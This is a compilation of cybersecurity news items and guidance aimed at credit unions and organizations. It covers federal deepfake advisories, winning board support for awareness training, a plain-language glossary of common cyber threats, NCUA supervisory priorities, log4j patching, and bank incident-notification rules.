NSA, FBI, and CISA Release Cybersecurity Information Sheet on Deepfake Threats

The National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Information Sheet (CSI), Contextualizing Deepfake Threats to Organizations, which provides an overview of synthetic media threats, techniques, and trends. Threats from synthetic media, such as deepfakes, have exponentially increased—presenting a growing challenge for users of modern technology and communications, including the National Security Systems (NSS), the Department of Defense (DoD), the Defense Industrial Base (DIB), and national critical infrastructure owners and operators. Between 2021 and 2022, U.S. Government agencies collaborated to establish a set of employable best practices to take in preparation and response to the growing threat. Public concern around synthetic media includes disinformation operations, designed to influence the public and spread false information about political, social, military, or economic issues to cause confusion, unrest, and uncertainty.

The authoring agencies urge organizations review the CSI for recommended steps and best practices to prepare, identify, defend against, and respond to deepfake threats.

To report suspicious activity or possible incidents involving deepfakes, contact one of the following agencies:

• Cybersecurity Report Feedback: [email protected]
• Internet Crime Complaint Center (IC3) at IC3.gov or contact a local FBI field office
• CISA’s Incident Reporting System or through the agency’s 24/7 Operations Center at [email protected] or (888) 282-0870

August 24, 2022 — With CyberSecurity Awareness month fast approaching, information security professionals and data protection managers will be looking at how to secure board-level buy-in for company-wide cybersecurity awareness campaigns. Often, this is the biggest hurdle for any cyber awareness campaign as senior leadership weighs the costs and benefits of investing in the security of their business.

Today we will be looking at some top tips for changing the tide on board-level buy-in.

What are the obstacles to Board-level buy-in and how to address them?

According to a study, by AT&T, board members covet data security as their number one concern, however, 75% of these boards do not actively put stock into internal cybersecurity campaigns.

With average data breach costs soaring to $4.4 million in 2022, the need to elevate cybersecurity initiatives on the boardroom agenda is increasing.

Why is there an understanding of the importance of cybersecurity awareness but no impetus to follow up with company-wide campaigns and initiatives?

1. Monetary Hurdles

Cybersecurity awareness providers can use behavior research tools and surveys to properly assess what areas of your company need to be addressed with training and development. This can then help you to present where and what your budget needs to be spent on, thus reassuring board members with facts and actionable insight and analysis. By doing this, you also instantly involve board members in the decision process.

2. Fear of change

One of the biggest hurdles to board buy-in is the fear of change and the comfort of following a tried and tested formula. People don’t like change and breaking leadership habits is very difficult to do.

In order to break this status quo, you need to increase board members involvement in security activities and simulations, especially considering recent developments in cybersecurity regulations.

When you do this, you can show your board members how easy it is to make mistakes and costly errors under the current protocols and teachings. When you root scenarios in relatable and personal examples, the risks associated with a cybersecurity event becomes clear for all board members.

3. Lack of security awareness

There is nothing harder than selling a new and improved security awareness campaign to your board members, especially if they have no security awareness at all. Why would they want to invest a portion of their finances in something that they do not understand? And why should the rest of your workers take security awareness seriously if their managers do not give it a second thought? It is meant to be a team effort after all, isn’t it?

This is a simple fix but requires hands-on work from an organization’s information security officer and/or data protection officer, with the help of your chosen training provider. You need to work to a trickle-down approach. First begin with focus groups and simulated training for board-level members, keeping a focus on the financial and legal ramifications companies face as a result of breaches. Position cybersecurity awareness as a proactive part of your organization with focus on Return on Investment (ROI), whilst highlighting how much more painful it is to be reactive to cybersecurity breaches.

How to engage Board members in the cybersecurity awareness conversation

When you implement a cybersecurity awareness campaign that is supported and planned out by the board, you increase the chances of company-wide buy-in and knowledge retention. So, how will you engage board members in the conversation? By speaking their language.

Sell it to them!

You need to encourage your board to focus on the risks and threat actors that target organizations every single day, but you also need to realize you are selling them something. When you are selling to your board, actualize the problems their employees face and use board-level language such as risk terminology and KPIs (Key Performance Indicators). board members want to see stone-cold numbers and measurable data to justify their investment.

Educate them regularly

The biggest reason board members struggle to support cybersecurity awareness initiatives is a lack of knowledge on the issue. If you are in charge of board buy-in, you need to regularly communicate cybersecurity insights, headlines, and stories with your board. They need to understand, in an easy-to-digest way, how cybersecurity is vital to the existence of their organization. Upskilling the board should always be a primary goal in any cybersecurity campaign!

It’s an investment, not a loss!

Board members want to hear things like ‘driving consistency’, ‘streamlining processes’, ‘minimizing human errors’, ‘avoiding reputational damage’, and ‘improving workflow’. Make it clear to your board members that they are making an investment which will lead to increased efficiency in the workforce and savings in the financial sheets. Begin with the message that cybersecurity is not a cost, it is an investment!

Bring in the pros

It is also highly beneficial to bring in the knowledge of a respected and experienced cybersecurity professional/consultant to add evidence to your board presentation. Cybersecurity professionals can run scoping workshops and team activities with your board to answer both company-specific questions and any technical questions that may arise.

In conclusion

Board-level buy-in is key to promoting a secure organization from top to bottom. Remember that your executives are still people, so it is important to communicate your objectives clearly, how your security awareness campaign addresses holes in your security culture and how it keeps your organization safe from cybercrime.

---

Courtesy of Tripwire Guest Authors

June 7, 2022 — Cyber attacks, hacking, and data breaches are a growing threat. Yet, many companies could have prevented these threats with a bit of risk management and a proactive approach to digital security.

Whether you’re going through a digital transformation or worried about data protection, these are the emerging cyber threats that you need to beware of.

---

A Forrester report showed that 94% of organizations suffered some type of cyber attack in 2020 alone. Even worse is that three-quarters of those attacks were due to a vulnerability caused by a technology put in place during the pandemic.

Data breaches cost businesses on average $4.24 million in 2021 [*]. And in breaches where remote work was a driving factor, the average cost was $1.07 million higher.

---

1. Malware: a combination of the words malicious and software — is an umbrella term used to refer to software that damages computers, websites, web servers, and networks. While malware isn’t a new threat, hackers are constantly capitalizing on new approaches. This includes ransomware, viruses, spyware, and trojans. Once installed, malware can deny access to your network, secretly obtain sensitive data, and even destroy your system.
2. Ransomware: is a type of malware that involves extortion. Hackers prevent users from accessing data, threatening to publish or delete it until a ransom is paid. Hackers take control of a victim’s computer when they click links or download attachments that contain malware.
3. Cryptojacking: uses your computer to secretly “mine” cryptocurrencies such as Bitcoin and Ethereum. While not an immediate threat, it can slow down your devices significantly. Hackers use phishing emails or other methods to get you to click a link that then downloads the cryptojacking malware to your device.
4. Viruses: are malicious pieces of code that damage your device and can replicate and spread between hosts. Much like flu viruses that can’t replicate without a host, computer viruses can’t spread without a host file or document. Once a virus successfully attaches to a host file or document, it can lay dormant until circumstances “trigger” it to execute its code. Once it does activate, the virus can spread across computers or even across corporate networks.
5. Trojans: named after the famed Trojan horse, this type of malware uses helpful software as a backdoor to gain access and exploit a computer or network. Trojans are widely used to steal credit card information. Users click on a link that hides the Trojan malware or unknowingly download it along with legitimate software. Once the file is clicked and opened, the download proceeds to install malware onto the device.
6. Worms: are self-contained malware that spread through other files and programs on their own. Unlike viruses which require a host, worms are standalone programs that can “wiggle” through your network. Worms are often sent through email attachments — they duplicate themselves and send a copy to all contacts in the hacked email list. Attackers can use worms to overload servers and achieve distributed denial of service (DDoS) attacks.
7. Spyware: is a type of malware installed to collect information about users, including their system or browsing habits. There are several different types of spyware to beware of. For example, Infostealers steal your information from browser forms. While Keyloggers record your keystrokes to catch sensitive data. Spyware is distributed in many ways — links, phishing emails, pop-ups, infected ads, or even poisoned links on Google search.Once a user clicks on the link, their data is sent remotely to an attacker. The information is then used to blackmail the victim or install other malicious programs.
8. Adware: displays unwanted ads on your computer. It can also change your browser homepage or even add unwanted plugins and other spyware. While adware isn’t quite a virus and isn’t as problematic as other code floating around the internet, you still need to remove it from your computer. Not only is it bothersome, but it could also cause other device issues down the line. Adware can come from either downloading it by mistake or getting it from a malicious website. Once it’s downloaded and installed, adware immediately starts tracking your web activity. One indicator that you’ve been infected is constant pop-up advertisements.
9. Drive-By Downloads: are programs that install on your devices without your consent. These include bundled software and unintentional downloads of any files. Drive-by downloads often take advantage of apps, operating systems, software, or web browsers that haven’t been updated. They can use any website as a delivery method for corrupted files. Just like other malware, drive-by downloads enter your computer unintentionally. You don’t have to click on or download anything for your computer to be infected — it just happens when you visit an infected website.
10. IoT Device attacks: Internet of Things (IoT) devices are common targets for bad actors as they don’t have space to run proper security systems and often store sensitive information like log-in details and passwords. Hackers exploit the weak security and constant connectedness of IoT devices to gain access to them. Once they install malware, hackers can link devices together and launch DDoS attacks. These attacks attempt to knock out networks by flooding them with traffic. IoT devices such as smart speakers can also act as a weak point in your network. Once hackers are in, they can gain access to your entire system.
11. Wipers — or wiper malware: damage organizations by wiping as much data (if not all) as possible. Unlike ransomware which has financial motives, wiper attacks are purely disruptive. Criminals may also use wiper attacks to cover the tracks of separate data thefts.Wipers often target files, backups, and the system boot section. Normally, hackers override files to destroy them, but they don’t do this in wiper attacks because it’s time-consuming. Instead, hackers write a certain amount of data at intervals which destroys files randomly.
12. Cross-Site Scripting (XSS): hackers insert malicious scripts into a website with the intent of stealing users’ identities through session tokens, cookies, and other information. The malicious code is usually JavaScript but can include Flash or HTML. XSS often occurs when users log onto a web application’s session. Victims unintentionally click on the content because they think it’s legitimate. But little do they know that the attacker altered the executed script, making XSS harmful and dangerous.
13. Phishing: has been around for years, but is consistently one of the most common ways hackers try to scam you online. It involves sending messages that seem to be from a trusted source to gain personal information or scam you into downloading malware. Phishing attacks can occur via email, text (known as “smishing”), phone calls, fake websites, and social networks. Hackers use a combination of social engineering tactics to gain your trust. Then, they send messages containing malware or a link to a fake site designed to steal your information.COVID-19 scams (like PPP fraud) and phishing schemes have been especially prevalent in the past few years [*]
14. Whale and spear phishing: is a phishing attack in which the prime targets are senior executives (aka the “big fish”). While spear phishing is a similar attack that hyper-targets a specific company or individual. In whaling, attackers impersonate high-level executives to try and steal sensitive data. In spear phishing, criminals research victims on LinkedIn or other social media sites and pose as a trusted source to gain access to their data.
15. Pharming: is when cybercriminals capture user credentials through a fake landing page. There are two types of pharming: malware and DNS cache poisoning. Malware-based pharming uses trojan horses to direct you to a fake website. For example, you’ll get a link to enter your credentials on your banking site. But the link routes you to a fake (yet believable) landing page designed to steal your information. With DNS cache poisoning, hackers exploit your DNS server. So even if you enter the URL of your banking site, you’ll still be redirected to the fake website without your knowledge.
16. SQL Injection Attacks: An SQL injection attack (SQLI) is typical in database-driven websites. SQL attacks happen when attackers inject code into a website or server database to steal money, change data, or erase web activity. Hackers find vulnerable website fields such as contact forms and insert malware. Once the SQL query is inserted into the website, the attacker can execute malicious commands on the database.
17. Denial of Service (DoS): is a website attack where attackers overwhelm a system or network with internet traffic. A variation of DoS attacks is the distributed denial of service (DDoS) attacks. With DDoS attacks, hackers infect computers on the network with malware to turn them into bots. Attackers control the bot network (or botnet) by sending instructions remotely. Some hackers even use artificial intelligence (AI) technologies for automation purposes. DDoS attacks result in a server overflow or network error. It can be challenging to separate DDoS traffic from regular traffic.
18. Brute Force Attacks: are a type of cryptographic attack where hackers use software to repeatedly guess your login credentials. One in five networks have experienced a brute force attack.Hackers attempt to access an account by trying different passwords until they guess the right one. When you’re against hackers with a powerful computing engine or control over an extensive botnet, it can pose a problem. Some warning signs that you’re under a brute force attack include:
    • The same IP address trying to log in multiple times.
    • Many IP addresses try to log into a single account.
    • Multiple unsuccessful login attempts being made from different IP addresses in a short period.
19. Man-in-the-Middle Attacks (MitM):  are a type of “shoulder surfing”  where hackers eavesdrop on your connection. Hackers intercept data transfers between a server and a client to steal data and manipulate traffic. Attackers insert themselves through an IoT device or exploit unsecured public Wi-Fi.
20. Insider Threats: are security risks that begin within the targeted organization. It often involves a current or former employee with administrator privileges or access to sensitive information. Insider threats have increased by 47% over the last two years [*], making them an emerging cyber threat. Insider threats occur when someone with authorized access misuses their access. Insider threats can be intentional or unintentional. Unintentional threats occur when a negligent employee falls victim to malware or phishing scams. Most security operations focus on external threats. But the best course of action for limiting insider threats is restricting employee access to systems they need for work.
21. Zero-Day Attacks: Zero-day attacks happen to websites with newly-discovered security vulnerabilities.​​The term ‘zero-day’ alludes to web developers recently discovering the flaw, which means they have had zero days to fix it. Attackers jump to take advantage of the small time frame in which the device or program is vulnerable. Preventing zero-day attacks requires constant monitoring and proactive detection.

Read more about these threats with real-life examples here. 

---

Courtesy of Christopher Bray, Aura

(Jan. 21, 2022) Credit risk management, cybersecurity and payment systems are the three top supervisory priorities for NCUA, the agency said this week.

Additionally, the agency indicated it will also be taking a closer look at overdraft programs at credit unions, with an eye to perhaps further action in 2023.

Overall, NCUA said in its letter to credit unions (22-CU-02), it will continue to conduct examination and supervision activities primarily offsite, given the uncertainty associated with the coronavirus crisis.

“Working with our public health consultant, the agency continues to closely monitor the COVID-19 pandemic trends and will resume onsite examination and supervision work when safe to do so,” the letter stated.

On its apparent top priority of credit risk management, the agency said its examiners would continue to review management and mitigation efforts at credit unions. “For all lending programs, credit unions’ risk management practices should be commensurate with the level of complexity and nature of their lending activities,” the agency letter states. “Credit unions must maintain safe-and-sound lending practices and comply with consumer financial protection laws, including disclosures and regulatory reporting requirements.”

Examiners will focus on adjustments credit unions made to lending programs to address borrowers facing financial hardship, the letter states. Examiners will also emphasize reviewing policies that address the use of loan workout strategies, risk-management practices, and “new strategies implemented to provide funds to borrowers under distress, including programs authorized under the CARES Act and extended in the Consolidated Appropriations Act, 2021,” the letter states. Examiners will evaluate credit unions’ controls, reporting, and tracking of these programs, in particular, NCUA wrote.

“NCUA examiners will not criticize a credit union’s efforts to provide prudent relief for borrowers when such efforts are conducted in a reasonable manner with proper controls and management oversight,” the letter stated.

On cybersecurity, the agency said it is developing updated information security examination procedures tailored to institutions of varying size and complexity. The procedures will be piloted and finalized this year, NCUA said. “Cybersecurity risks remain a significant threat to the financial system,” the letter stated. “Ransomware, third-party/supply chain risks, and business email compromises, in particular, continue to be of concern.”

The agency asserted that payment systems are growing in complexity and risk for credit unions and consumers, pledging increased focus in the area. “Today’s environment of easy and fast electronic processing of transactions relies on technology, the applications and their controls, and the underlying security of the platforms facilitating the transactions,” NCUA wrote. “The changes in payment systems increase the risk of fraud, illicit use, and breaches of data security.”

Key points of the other priorities include:

• Overdraft programs (consumer financial protection): Examiners will request information about a credit union’s policies and procedures governing its overdraft programs and the monitoring tools and audit of its overdraft programs, as well as the communications it provides to consumers about such programs. “We anticipate using this documentation for a fuller review of credit unions’ overdraft programs in 2023,” NCUA wrote.
• Loan-loss reserving: The agency reminded that credit unions subject to generally accepted accounting principles (GAAP) are required to implement the current expected credit losses (CECL) accounting methodology by the start of next year. (Credit unions under $10 million are not required to follow GAAP.) All federal credit unions, the agency noted, will be required to have a reasonable reserve methodology, provided the methodology adequately covers known and probable loan losses. Federally insured, state-chartered credit unions (FISCUs) should refer to state law on GAAP accounting requirements and CECL standard applicability, the agency wrote.
• Loan participations: Examiners will verify that credit unions have evaluated the risk in the loan participation transactions and how that risk fits within the tolerance levels established by the credit union’s board. At a transactional level, NCUA said, each loan participation must have separate and distinct records for individual payments, including principal, interest, fees, escrows, and other information relating to individual loans.
• LIBOR transition: Examiners will focus on credit unions with significant LIBOR exposure or inadequate fallback language.

LINK:

NCUA Letter to Credit Unions 22-CU-02: NCUA’s 2022 Supervisory Priorities

 

(Dec. 23, 2021) The revelation of the “log4j” computer vulnerability made headlines this week, and NASCUS followed up by posting on its cybersecurity alerts and responses web pages guidance from federal agencies on how to protect against exploitations of the weakness.

Late last week, the federal CyberSecutiry & Infrastructure Security Agency (CISA) released a directive ordering federal civilian executive branch agencies to address vulnerabilities of log4j, a component widely used in Java scriptwriting for computer routines, including on websites and in applications. The component holds a “critical remote code execution” (RCE) vulnerability that computer and network security officials have found is being exploited by hackers. CISA described the hacks as “active, widespread exploitation.”

Friday’s directive, according to CISA, requires agencies to implement additional mitigation measures for vulnerable products where patches are not currently available and requires agencies to patch vulnerable internet-facing assets immediately.

By the beginning of this week, news about the vulnerability was reported widely in the press, with some headlines stating the vulnerability could be the “most serious in decades.”

Federal civilian agencies have until Friday to complete patching for log4j, according to press reports.

But that may not be enough, according to cybersecurity experts, as by then hackers may have already found their way into systems using the code.

In the meantime, users are advised to be on the lookout for phishing emails (and many of them) – and NOT to click on any links. For example, in response to an email claiming that an account has been compromised or a package failed to deliver, a user should ensure first that an account actually exists with that company and the user was expecting an email. Then, the user should find a real customer service number or address online and reach out in either (or both) of those methods.

Additionally, updating systems and apps with patches provided by software developers is the best defense, according to security networks.

LINK:

NASCUS Cybersecurity Alerts & Resources: Apache Log4j Vulnerability Guidance

(Dec. 17, 2021) Self-testing of credit unions’ cybersecurity preparedness through an application released in October costs nothing and can be downloaded via NCUA’s website, the agency said in a letter this week to federally insured credit unions.

The Automated Cybersecurity Evaluation Toolbox (ACET) was created to help credit unions conduct a maturity assessment that aligns with the Federal Financial Information Council’s (FFIEC) Cybersecurity Assessment Tool, NCUA said in letter 21-CU-15, signed by agency board Chairman Todd Harper. It said the toolbox can be used by institutions of all sizes and complexity to determine and measure their information and cybersecurity preparedness against several industry standards and best practices.

The agency said the assessment incorporates cybersecurity standards and practices established for financial institutions: It includes practices found in the FFIEC IT Examination Handbooks, regulatory guidance, and leading industry standards like the National Institute of Standards and Technology (NIST) Cybersecurity Framework.

“While we highly encourage the use and implementation of the maturity assessment for a credit union to determine its information and cybersecurity preparedness level, it is only a self-assessment,” according to the letter. “Credit unions are not required to use the Toolbox or complete the maturity assessment. However, it can provide insight into additional steps a credit union may consider taking to strengthen its overall security posture.”

LINK:

NCUA Letter 21-CU-15

(Nov. 24, 2021) A final rule requiring banks to notify their federal regulators of certain cyber incidents with potentially systemic effects was approved jointly late last week; it takes effect April 1, with compliance required by May 1. NCUA has not yet adopted a similar rule for credit unions.

Adopted by the Federal Reserve, FDIC, and OCC, the final rule requires a banking organization to notify its primary federal regulator of any “computer-security incident” that rises to the level of a “notification incident” as soon as possible and no later than 36 hours after the banking organization determines that a cyber incident has occurred, according to a notice for the Federal Register.

The final rule defines a “notification incident” as a computer-security incident that has materially disrupted or degraded, or is reasonably likely to materially disrupt or degrade, a banking organization’s:

• ability to carry out banking operations, activities, or processes, or deliver banking products and services to a material portion of its customer base, in the ordinary course of business;
• business line (or lines), including associated operations, services, functions, and support, that upon failure would result in a material loss of revenue, profit, or franchise value; or
• operations, including associated services, functions and support, as applicable, the failure or discontinuance of which would pose a threat to the financial stability of the United States.

The final rule also requires a bank service provider to notify each affected banking organization customer as soon as possible when the bank service provider determines that it has experienced a computer-security incident that has caused, or is reasonably likely to cause, a material service disruption or degradation for four or more hours, the notice states.

LINK:

Agencies approve final rule requiring computer-security incident notification

(Nov. 19, 2021) Monetary policy, inflation, and cyberattacks could heighten risk to the financial system, according to the annual report issued this week by the Treasury office tasked with conducting financial research.

The report also raised concerns about risks related to low bank profitability, commercial real estate performance and hedge fund strategies.

According to the Office of Financial Research (OFR) annual report to Congress, the economy has rebounded and volatility caused by the pandemic has subsided. However, the other challenges to the financial system mean the overall risks to the financial system remain in the medium range.

According to the OFR press release, the report, highlights three key research findings related to financial system vulnerabilities:

• Macroeconomic uncertainty remains about the continuing impact of the coronavirus and the “pattern of inflation.”
• Cyber risk has grown from mounting economic costs inflicted by cyberattacks and the increasing expense required to guard against them.
• The potential risk from climate change – which has introduced vulnerabilities – is still difficult to identify, assess and forecast for the financial system.

About “sector-specific” risk, the report notes that risks tied to low rates on banks’ profits should be closely monitored. “Higher interest rates on longer-term investments, such as 10-year Treasuries, did not increase net interest margins,” OFR said. “While further research is necessary, possible explanations include lower loan demand and less willingness on the part of banks to lend at longer maturities or take on more deposits.”

LINK:

Office of Financial Research Finds COVID Headwinds Eased, But Other Financial System Vulnerabilities Are Taking Shape

(Nov. 5, 2021) Addressing and mitigating actively exploited vulnerabilities on all federal agency computer networks is the aim of a directive issued this week by the federal agency that oversees cybersecurity, which the agency said is a first-ever federal government-wide requirement.

In issuing the order, the Cybersecurity and Infrastructure Security Agency (CISA) said it also encourages state and local governments, as well as the private sector, to also take action.

The “Binding Operational Directive” (BOD 22-01), CISA said, is sending a “clear message to all organizations across the country to focus patching on the subset of vulnerabilities that are causing harm now, and enable CISA to drive continuous prioritization of vulnerabilities based on our understanding of adversary activity.”

The order, the agency said, applies to all software and hardware found on federal information systems, including those managed on agency premises or hosted by third parties on an agency’s behalf. According to agency Director Jen Easterly, the order lays out clear requirements for federal civilian agencies to take immediate action to improve their vulnerability management practices and dramatically reduce their exposure to cyber attacks.

“While this Directive applies to federal civilian agencies, we know that organizations across the country, including critical infrastructure entities, are targeted using these same vulnerabilities,” she said. “It is therefore critical that every organization adopt this Directive and prioritize mitigation of vulnerabilities listed in CISA’s public catalog.”

The agency noted that the order prioritizes resources for patching vulnerabilities that are most likely to result in a damaging intrusion into federal agencies and American businesses, “building upon existing methods widely used to prioritize vulnerabilities by many organizations today.”

LINK:

CISA Releases Directive on Reducing The Significant Risk Of Known Exploited Vulnerabilities

(Oct. 22, 2021) Speaking of cybersecurity: Use of cloud-based email services are proving to be targets for cybercriminals, and credit unions need to take steps to thwart any exploitation and take preventative steps, NCUA said this week.

In Risk Alert 21-RISK-01, the agency said phishing emails designed to steal account credentials through cloud-based email services have proven to be among the most effective types of business email compromise (BEC) scams. The agency said that action occurs by cybercriminals using phishing kits to target victims on cloud-based services, analyze accounts, impersonate email communications, fraudulently demand (and receive) payments, compromise address books, send more phishing emails — and more.

The risk alert listed 12 methods credit unions may take to prevent BEC fraud; the top three are: Enable multi-factor authentication for all email accounts; disable basic or legacy account authentication that does not support multi-factor authentication; use caution when posting information on social media and company websites, especially job duties and descriptions, hierarchal information, and out-of-office details.

The risk alert also notes wire transfer fraud incidents are also increasing, as more transactions through virtual environments have tilted that way. The alert lists a number of operational, transactional, and physical and logical controls for limiting wire fraud risk and incidents.

LINK:

NCUA Risk Alert (21-RISK-01): Business Email Compromise through Exploitation of Cloud-Based Email Services

(Oct. 22, 2021) Ransonware risks and threats to credit unions and other financial institutions are rising considerably, the NCUA Board was told Thursday, noting that the method now accounts for 10% of all cyber breaches.

The threat, NCUA Critical Infrastructure Division Director Ernie Chambers told the board, is enabled by cryptocurrency and has been cited as “among the largest of cybersecurity threats” today to financial institutions.

The cybersecurity presentation was made to the board partly in advance the updated Automated Cybersecurity Evaluation Toolbox (ACET), which will be introduced by the agency in a webinar set for next week (Oct. 28).

Chambers also cited phishing and supply chain attacks as key threats to the credit union system; he urged institutions to take steps to address each.

“NASCUS applauds NCUA’s comprehensive approach to fostering credit union cybersecurity resilience,” NASCUS’s Lucy Ito said. In addition to NCUA’s enhanced ACET self-assessment tool, she said, NASCUS supports the agency’s plan for rolling out Information Technology Risk Examination for Credit Unions (InTRExCU) in 2022. The system is based on the FDIC’s InTREx program for banks and has been adapted for credit union use.

“Several state agencies are already utilizing FDIC’s InTREx tools in state credit union IT examinations,” Ito noted. “This early adoption of InTREx in state regulator supervisory programs combined with NCUA’s InTRExCU pilot, together provide proof of concept for the relevance and value of adopting InTREx more broadly as a tool for evaluating credit union cyber hygiene and exposure.”

She said with most credit union CEOs citing cybersecurity risks as their greatest concern, utilizing a proven, scalable examination tool such as InTREx should be a “welcome addition to the national credit union system’s collective arsenal.”

LINK:

NCUA Board Briefing, Cybersecurity (in PowerPoint format)

(Oct. 15, 2021) Describing a new set of tools it has developed to promote digital safety as a “holistic cybersecurity resource” for credit unions, NCUA has scheduled an Oct. 28 webinar on the tool kit, the agency said this week.

The 60-minute webinar will cover the agency’s “Automated Cybersecurity Evaluation Toolbox (ACET),” and features participation by agency Board Chairman Harper. The event is scheduled to get underway at 3 p.m. ET.

According to the agency, the ACET is a downloadable self-contained application, developed for credit unions by the agency, which guides credit unions through the ACET “Maturity Assessment.” NCUA said that component is aligned with the FFIEC’s Cybersecurity Assessment Tool (CAT). The maturity assessment, the agency said, allows credit unions of all sizes to determine and measure their own cybersecurity preparedness over time.

The ACET also contains, NCUA said, several other types of industry recognized cybersecurity best practices and standards, including the “Ransomware Readiness Assessment (RRA)” from the federal government’s Cybersecurity & Infrastructure Security Agency (CISA). According to NCUA, the RRA is a “self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend and recover from a ransomware incident.”

The webinar will include a question-and-answer session with participants. Registration for the event is now open, NCUA said; there is no fee.

LINK:

Understanding the Automated Cybersecurity Examination Tool (ACET)